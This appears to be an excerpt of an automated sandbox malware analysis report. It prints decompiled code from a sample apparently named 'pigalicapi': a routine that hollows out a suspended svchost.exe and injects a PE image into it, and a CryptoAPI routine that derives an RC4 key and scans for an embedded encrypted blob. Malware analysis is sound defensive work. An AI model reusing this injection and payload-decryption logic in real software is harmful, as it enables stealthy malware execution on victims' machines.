                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtual$EventInitializeObjectSingleUninitializeWait
                                                                                                                                                                                                                                                                          • String ID: $`$pigalicapi
                                                                                                                                                                                                                                                                          • API String ID: 1834614700-42206024
                                                                                                                                                                                                                                                                          • Opcode ID: 0b588b8632747e3a4410319c3fb32f93fea484f2e03b927fbc22a93c38a5764c
                                                                                                                                                                                                                                                                          • Instruction ID: f4bd0befb8abd7887e3d73177c72bf7f141d25b4899fa760b57ca1a426edb567
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b588b8632747e3a4410319c3fb32f93fea484f2e03b927fbc22a93c38a5764c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39628DB1D00218ABFB14DBA0DC84FEDB7B9AF49309F04C559E6057B281E775AA84CF61
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040020B0(intOrPtr _a4, signed char _a8, CHAR* _a12) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                                                                                          				struct _CONTEXT _v996;
                                                                                                                                                                                                                                                                          				struct _PROCESS_INFORMATION _v1012;
                                                                                                                                                                                                                                                                          				intOrPtr _v1016;
                                                                                                                                                                                                                                                                          				struct _STARTUPINFOA _v1092;
                                                                                                                                                                                                                                                                          				intOrPtr _v1096;
                                                                                                                                                                                                                                                                          				void _v1100;
                                                                                                                                                                                                                                                                          				signed int _v1104;
                                                                                                                                                                                                                                                                          				CHAR* _t121;
                                                                                                                                                                                                                                                                          				void* _t128;
                                                                                                                                                                                                                                                                          				int _t130;
                                                                                                                                                                                                                                                                          				void* _t132;
                                                                                                                                                                                                                                                                          				int _t140;
                                                                                                                                                                                                                                                                          				int _t143;
                                                                                                                                                                                                                                                                          				int _t145;
                                                                                                                                                                                                                                                                          				int _t148;
                                                                                                                                                                                                                                                                          				void* _t263;
                                                                                                                                                                                                                                                                          				void* _t265;
                                                                                                                                                                                                                                                                          				void* _t266;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				if(_a4 == 0) {
                                                                                                                                                                                                                                                                          					L26:
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				GetEnvironmentVariableA("SystemRoot",  &_v276, 0x104);
                                                                                                                                                                                                                                                                          				_t121 = lstrcatA( &_v276, "\\system32\\svchost.exe");
                                                                                                                                                                                                                                                                          				if(_a12 != 0) {
                                                                                                                                                                                                                                                                          					lstrcatA( &_v276, " ");
                                                                                                                                                                                                                                                                          					_t121 = lstrcatA( &_v276, _a12);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				E04007D20(_t121,  &_v1012, 0, 0x10);
                                                                                                                                                                                                                                                                          				E04007D20( &_v1092,  &_v1092, 0, 0x44);
                                                                                                                                                                                                                                                                          				_t265 = _t263 + 0x18;
                                                                                                                                                                                                                                                                          				_v1092.cb = 0x44;
                                                                                                                                                                                                                                                                          				_v1096 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                          				_v1016 = _v1096 + ( *(_v1096 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                          				_v8 =  *((intOrPtr*)(_v1096 + 0x50));
                                                                                                                                                                                                                                                                          				_t128 = VirtualAlloc(0, _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                          				_v12 = _t128;
                                                                                                                                                                                                                                                                          				if(_v12 != 0) {
                                                                                                                                                                                                                                                                          					_t130 = CreateProcessA(0,  &_v276, 0, 0, 0, 4, 0, 0,  &_v1092,  &_v1012); // executed
                                                                                                                                                                                                                                                                          					if(_t130 != 0) {
                                                                                                                                                                                                                                                                          						_t132 = VirtualAllocEx(_v1012.hProcess,  *(_v1096 + 0x34), _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                          						_v1100 = _t132;
                                                                                                                                                                                                                                                                          						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                          							L10:
                                                                                                                                                                                                                                                                          							E04007B70(_v12, _a4,  *((intOrPtr*)(_v1096 + 0x54)));
                                                                                                                                                                                                                                                                          							_t266 = _t265 + 0xc;
                                                                                                                                                                                                                                                                          							_v1104 = 0;
                                                                                                                                                                                                                                                                          							while(_v1104 < ( *(_v1096 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                          								if((_a8 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          									E04007B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                          									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									E04007B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0x14 + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                          									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v1104 = _v1104 + 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							E040026D0(_v12, _v1100);
                                                                                                                                                                                                                                                                          							_t140 = WriteProcessMemory(_v1012.hProcess, _v1100, _v12, _v8, 0); // executed
                                                                                                                                                                                                                                                                          							if(_t140 != 0) {
                                                                                                                                                                                                                                                                          								VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          								_v996.ContextFlags = 0x10007;
                                                                                                                                                                                                                                                                          								_t143 = GetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                          								if(_t143 != 0) {
                                                                                                                                                                                                                                                                          									_t145 = WriteProcessMemory(_v1012.hProcess, _v996.Ebx + 8,  &_v1100, 4, 0); // executed
                                                                                                                                                                                                                                                                          									if(_t145 != 0) {
                                                                                                                                                                                                                                                                          										_v996.Eax = _v1100 +  *((intOrPtr*)(_v1096 + 0x28));
                                                                                                                                                                                                                                                                          										_t148 = SetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                          										if(_t148 == 0) {
                                                                                                                                                                                                                                                                          											TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                          											CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                          											CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                          											goto L26;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										ResumeThread(_v1012.hThread); // executed
                                                                                                                                                                                                                                                                          										return _v1012.hProcess;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                          									CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                          									CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                          									return 0;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                          								CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                          								CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                          								return 0;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                          							CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                          							CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                          							VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v1100 = VirtualAllocEx(_v1012.hProcess, 0, _v8, 0x103000, 0x40);
                                                                                                                                                                                                                                                                          						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                          							goto L10;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                          						CloseHandle(_v1012);
                                                                                                                                                                                                                                                                          						CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                          						VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                                                                          0x040020bd
                                                                                                                                                                                                                                                                          0x04002502
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002502
                                                                                                                                                                                                                                                                          0x040020d4
                                                                                                                                                                                                                                                                          0x040020e6
                                                                                                                                                                                                                                                                          0x040020f0
                                                                                                                                                                                                                                                                          0x040020fe
                                                                                                                                                                                                                                                                          0x0400210f
                                                                                                                                                                                                                                                                          0x0400210f
                                                                                                                                                                                                                                                                          0x04002120
                                                                                                                                                                                                                                                                          0x04002133
                                                                                                                                                                                                                                                                          0x04002138
                                                                                                                                                                                                                                                                          0x0400213b
                                                                                                                                                                                                                                                                          0x0400214e
                                                                                                                                                                                                                                                                          0x04002168
                                                                                                                                                                                                                                                                          0x04002177
                                                                                                                                                                                                                                                                          0x04002187
                                                                                                                                                                                                                                                                          0x0400218d
                                                                                                                                                                                                                                                                          0x04002194
                                                                                                                                                                                                                                                                          0x040021c0
                                                                                                                                                                                                                                                                          0x040021c8
                                                                                                                                                                                                                                                                          0x040021fe
                                                                                                                                                                                                                                                                          0x04002204
                                                                                                                                                                                                                                                                          0x04002211
                                                                                                                                                                                                                                                                          0x0400227d
                                                                                                                                                                                                                                                                          0x0400228f
                                                                                                                                                                                                                                                                          0x04002294
                                                                                                                                                                                                                                                                          0x04002297
                                                                                                                                                                                                                                                                          0x040022b2
                                                                                                                                                                                                                                                                          0x040022ce
                                                                                                                                                                                                                                                                          0x0400235e
                                                                                                                                                                                                                                                                          0x04002363
                                                                                                                                                                                                                                                                          0x040022d0
                                                                                                                                                                                                                                                                          0x04002312
                                                                                                                                                                                                                                                                          0x04002317
                                                                                                                                                                                                                                                                          0x04002317
                                                                                                                                                                                                                                                                          0x040022ac
                                                                                                                                                                                                                                                                          0x040022ac
                                                                                                                                                                                                                                                                          0x04002376
                                                                                                                                                                                                                                                                          0x04002396
                                                                                                                                                                                                                                                                          0x0400239e
                                                                                                                                                                                                                                                                          0x040023ec
                                                                                                                                                                                                                                                                          0x040023f2
                                                                                                                                                                                                                                                                          0x0400240a
                                                                                                                                                                                                                                                                          0x04002412
                                                                                                                                                                                                                                                                          0x04002460
                                                                                                                                                                                                                                                                          0x04002468
                                                                                                                                                                                                                                                                          0x040024a6
                                                                                                                                                                                                                                                                          0x040024ba
                                                                                                                                                                                                                                                                          0x040024c2
                                                                                                                                                                                                                                                                          0x040024e2
                                                                                                                                                                                                                                                                          0x040024ef
                                                                                                                                                                                                                                                                          0x040024fc
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040024fc
                                                                                                                                                                                                                                                                          0x040024cb
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040024d1
                                                                                                                                                                                                                                                                          0x04002473
                                                                                                                                                                                                                                                                          0x04002480
                                                                                                                                                                                                                                                                          0x0400248d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002493
                                                                                                                                                                                                                                                                          0x0400241d
                                                                                                                                                                                                                                                                          0x0400242a
                                                                                                                                                                                                                                                                          0x04002437
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400243d
                                                                                                                                                                                                                                                                          0x040023a9
                                                                                                                                                                                                                                                                          0x040023b6
                                                                                                                                                                                                                                                                          0x040023c3
                                                                                                                                                                                                                                                                          0x040023d4
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040023da
                                                                                                                                                                                                                                                                          0x0400222d
                                                                                                                                                                                                                                                                          0x0400223a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002245
                                                                                                                                                                                                                                                                          0x04002252
                                                                                                                                                                                                                                                                          0x0400225f
                                                                                                                                                                                                                                                                          0x04002270
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002276
                                                                                                                                                                                                                                                                          0x040021d5
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002196
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002196

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 040020D4
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,\system32\svchost.exe), ref: 040020E6
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0400C38C), ref: 040020FE
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 0400210F
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 04002187
                                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 040021C0
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040021D5
                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 040021FE
                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,?,00103000,00000040), ref: 04002227
                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 04002245
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04002252
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0400225F
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04002270
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Virtual$Alloclstrcat$CloseFreeHandleProcess$CreateEnvironmentTerminateVariable
                                                                                                                                                                                                                                                                          • String ID: D$SystemRoot$\system32\svchost.exe
                                                                                                                                                                                                                                                                          • API String ID: 1819736980-1559310322
                                                                                                                                                                                                                                                                          • Opcode ID: 618df5bf54c1a5a0a6d1612c0a6f02d09146bff70f4639aa179a0dfbd2a6d315
                                                                                                                                                                                                                                                                          • Instruction ID: 24de31acf85f81f6cd7956eb3c6d21bf067972eab508d3ad9c1f9881985dd567
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 618df5bf54c1a5a0a6d1612c0a6f02d09146bff70f4639aa179a0dfbd2a6d315
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27D13F71A44215ABEB28DF54CC94FAE77B9FB48304F0486D8F609B7281D678AE80CF55
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 560 40047f0-4004801 561 4004807-400480e 560->561 562 4004aab-4004ab1 560->562 561->562 563 4004814-4004832 CryptAcquireContextA 561->563 564 4004834-400483f GetLastError 563->564 565 4004856-400485a 563->565 564->565 567 4004841-4004850 CryptAcquireContextA 564->567 565->562 566 4004860-400489d 565->566 569 40048a3-40048f3 call 4007b70 CryptCreateHash 566->569 570 4004a9f-4004aa5 CryptReleaseContext 566->570 567->565 573 4004a90-4004a96 569->573 574 40048f9-4004913 CryptHashData 569->574 570->562 575 4004a98 573->575 576 4004a9a 573->576 577 4004a83-4004a8a CryptDestroyHash 574->577 578 4004919-4004944 CryptDeriveKey 574->578 575->570 576->570 577->573 578->577 579 400494a-400498f CryptDecrypt CryptDestroyKey 578->579 579->577 580 4004995-40049b1 CryptCreateHash 579->580 580->577 581 40049b7-40049d4 CryptHashData 580->581 582 4004a76-4004a7d CryptDestroyHash 581->582 583 40049da-4004a0f CryptGetHashParam 581->583 582->577 583->582 584 4004a11-4004a3c CryptGetHashParam 583->584 584->582 585 4004a3e-4004a58 call 4007c70 584->585 585->582 588 4004a5a-4004a72 call 4007b70 585->588 588->582
                                                                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                                                                          			E040047F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				signed int _v5;
                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                                                                          				char _v764;
                                                                                                                                                                                                                                                                          				char _v780;
                                                                                                                                                                                                                                                                          				intOrPtr _v784;
                                                                                                                                                                                                                                                                          				char _v788;
                                                                                                                                                                                                                                                                          				int _v792;
                                                                                                                                                                                                                                                                          				int _v796;
                                                                                                                                                                                                                                                                          				intOrPtr _v800;
                                                                                                                                                                                                                                                                          				long* _v804;
                                                                                                                                                                                                                                                                          				int _v808;
                                                                                                                                                                                                                                                                          				int _v812;
                                                                                                                                                                                                                                                                          				char _v816;
                                                                                                                                                                                                                                                                          				int _v820;
                                                                                                                                                                                                                                                                          				char _v824;
                                                                                                                                                                                                                                                                          				char _v828;
                                                                                                                                                                                                                                                                          				char _v844;
                                                                                                                                                                                                                                                                          				int _t61;
                                                                                                                                                                                                                                                                          				char* _t67;
                                                                                                                                                                                                                                                                          				intOrPtr _t68;
                                                                                                                                                                                                                                                                          				int _t69;
                                                                                                                                                                                                                                                                          				char* _t73;
                                                                                                                                                                                                                                                                          				intOrPtr _t74;
                                                                                                                                                                                                                                                                          				intOrPtr _t76;
                                                                                                                                                                                                                                                                          				intOrPtr _t77;
                                                                                                                                                                                                                                                                          				signed char _t78;
                                                                                                                                                                                                                                                                          				void* _t109;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 <= 0x300) {
                                                                                                                                                                                                                                                                          					L25:
                                                                                                                                                                                                                                                                          					return _v5;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_t61 = CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                          					if(_t61 == 0 && GetLastError() == 0x80090016) {
                                                                                                                                                                                                                                                                          						CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_v788 = 0x10;
                                                                                                                                                                                                                                                                          						_v784 = 0x10;
                                                                                                                                                                                                                                                                          						_v792 = 0;
                                                                                                                                                                                                                                                                          						while(_v792 < _a8 - 0x2ff) {
                                                                                                                                                                                                                                                                          							E04007B70( &_v780, _a4 + _v792, 0x300);
                                                                                                                                                                                                                                                                          							_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                          							_t67 =  &_v780;
                                                                                                                                                                                                                                                                          							_v800 = _t67;
                                                                                                                                                                                                                                                                          							_v796 = 0;
                                                                                                                                                                                                                                                                          							__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v796); // executed
                                                                                                                                                                                                                                                                          							if(_t67 == 0) {
                                                                                                                                                                                                                                                                          								L21:
                                                                                                                                                                                                                                                                          								if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          									_v792 = _v792 + 1;
                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_t68 = _v800;
                                                                                                                                                                                                                                                                          							__imp__CryptHashData(_v796, _t68, 0x10, 0);
                                                                                                                                                                                                                                                                          							if(_t68 != 0) {
                                                                                                                                                                                                                                                                          								_v804 = 0;
                                                                                                                                                                                                                                                                          								_t69 = _v796;
                                                                                                                                                                                                                                                                          								__imp__CryptDeriveKey(_v12, 0x6801, _t69, 1,  &_v804); // executed
                                                                                                                                                                                                                                                                          								if(_t69 != 0) {
                                                                                                                                                                                                                                                                          									_v812 = 0x2f0;
                                                                                                                                                                                                                                                                          									_v808 = CryptDecrypt(_v804, 0, 1, 0,  &_v764,  &_v812);
                                                                                                                                                                                                                                                                          									CryptDestroyKey(_v804);
                                                                                                                                                                                                                                                                          									if(_v808 != 0) {
                                                                                                                                                                                                                                                                          										_t73 =  &_v816;
                                                                                                                                                                                                                                                                          										__imp__CryptCreateHash(_v12, 0x8003, 0, 0, _t73);
                                                                                                                                                                                                                                                                          										if(_t73 != 0) {
                                                                                                                                                                                                                                                                          											_t74 = _v816;
                                                                                                                                                                                                                                                                          											__imp__CryptHashData(_t74,  &_v780, 0x2f0, 0);
                                                                                                                                                                                                                                                                          											if(_t74 != 0) {
                                                                                                                                                                                                                                                                          												_v820 = 0;
                                                                                                                                                                                                                                                                          												_v824 = 4;
                                                                                                                                                                                                                                                                          												_t76 = _v816;
                                                                                                                                                                                                                                                                          												__imp__CryptGetHashParam(_t76, 4,  &_v820,  &_v824, 0);
                                                                                                                                                                                                                                                                          												if(_t76 != 0) {
                                                                                                                                                                                                                                                                          													_v828 = 0x10;
                                                                                                                                                                                                                                                                          													_t77 = _v816;
                                                                                                                                                                                                                                                                          													__imp__CryptGetHashParam(_t77, 2,  &_v844,  &_v828, 0);
                                                                                                                                                                                                                                                                          													if(_t77 != 0) {
                                                                                                                                                                                                                                                                          														_t78 = E04007C70( &_v28,  &_v844,  &_v28, 0x10);
                                                                                                                                                                                                                                                                          														_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                          														if((_t78 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          															E04007B70(_a12,  &_v780, 0x300);
                                                                                                                                                                                                                                                                          															_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                          															_v5 = 1;
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											__imp__CryptDestroyHash(_v816);
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							__imp__CryptDestroyHash(_v796);
                                                                                                                                                                                                                                                                          							goto L21;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L25;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}































                                                                                                                                                                                                                                                                          0x040047f9
                                                                                                                                                                                                                                                                          0x04004801
                                                                                                                                                                                                                                                                          0x04004aab
                                                                                                                                                                                                                                                                          0x04004ab1
                                                                                                                                                                                                                                                                          0x04004814
                                                                                                                                                                                                                                                                          0x04004814
                                                                                                                                                                                                                                                                          0x0400482a
                                                                                                                                                                                                                                                                          0x04004832
                                                                                                                                                                                                                                                                          0x04004850
                                                                                                                                                                                                                                                                          0x04004850
                                                                                                                                                                                                                                                                          0x0400485a
                                                                                                                                                                                                                                                                          0x04004860
                                                                                                                                                                                                                                                                          0x0400486a
                                                                                                                                                                                                                                                                          0x04004874
                                                                                                                                                                                                                                                                          0x0400488f
                                                                                                                                                                                                                                                                          0x040048b9
                                                                                                                                                                                                                                                                          0x040048be
                                                                                                                                                                                                                                                                          0x040048c1
                                                                                                                                                                                                                                                                          0x040048c7
                                                                                                                                                                                                                                                                          0x040048cd
                                                                                                                                                                                                                                                                          0x040048eb
                                                                                                                                                                                                                                                                          0x040048f3
                                                                                                                                                                                                                                                                          0x04004a90
                                                                                                                                                                                                                                                                          0x04004a96
                                                                                                                                                                                                                                                                          0x04004889
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004889
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004a98
                                                                                                                                                                                                                                                                          0x040048fd
                                                                                                                                                                                                                                                                          0x0400490b
                                                                                                                                                                                                                                                                          0x04004913
                                                                                                                                                                                                                                                                          0x04004919
                                                                                                                                                                                                                                                                          0x0400492c
                                                                                                                                                                                                                                                                          0x0400493c
                                                                                                                                                                                                                                                                          0x04004944
                                                                                                                                                                                                                                                                          0x0400494a
                                                                                                                                                                                                                                                                          0x04004975
                                                                                                                                                                                                                                                                          0x04004982
                                                                                                                                                                                                                                                                          0x0400498f
                                                                                                                                                                                                                                                                          0x04004995
                                                                                                                                                                                                                                                                          0x040049a9
                                                                                                                                                                                                                                                                          0x040049b1
                                                                                                                                                                                                                                                                          0x040049c5
                                                                                                                                                                                                                                                                          0x040049cc
                                                                                                                                                                                                                                                                          0x040049d4
                                                                                                                                                                                                                                                                          0x040049da
                                                                                                                                                                                                                                                                          0x040049e4
                                                                                                                                                                                                                                                                          0x04004a00
                                                                                                                                                                                                                                                                          0x04004a07
                                                                                                                                                                                                                                                                          0x04004a0f
                                                                                                                                                                                                                                                                          0x04004a11
                                                                                                                                                                                                                                                                          0x04004a2d
                                                                                                                                                                                                                                                                          0x04004a34
                                                                                                                                                                                                                                                                          0x04004a3c
                                                                                                                                                                                                                                                                          0x04004a4b
                                                                                                                                                                                                                                                                          0x04004a50
                                                                                                                                                                                                                                                                          0x04004a58
                                                                                                                                                                                                                                                                          0x04004a6a
                                                                                                                                                                                                                                                                          0x04004a6f
                                                                                                                                                                                                                                                                          0x04004a72
                                                                                                                                                                                                                                                                          0x04004a72
                                                                                                                                                                                                                                                                          0x04004a58
                                                                                                                                                                                                                                                                          0x04004a3c
                                                                                                                                                                                                                                                                          0x04004a0f
                                                                                                                                                                                                                                                                          0x04004a7d
                                                                                                                                                                                                                                                                          0x04004a7d
                                                                                                                                                                                                                                                                          0x040049b1
                                                                                                                                                                                                                                                                          0x0400498f
                                                                                                                                                                                                                                                                          0x04004944
                                                                                                                                                                                                                                                                          0x04004a8a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004a8a
                                                                                                                                                                                                                                                                          0x04004aa5
                                                                                                                                                                                                                                                                          0x04004aa5
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400485a

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 0400482A
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04004834
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04004850
                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 040048EB
                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0400490B
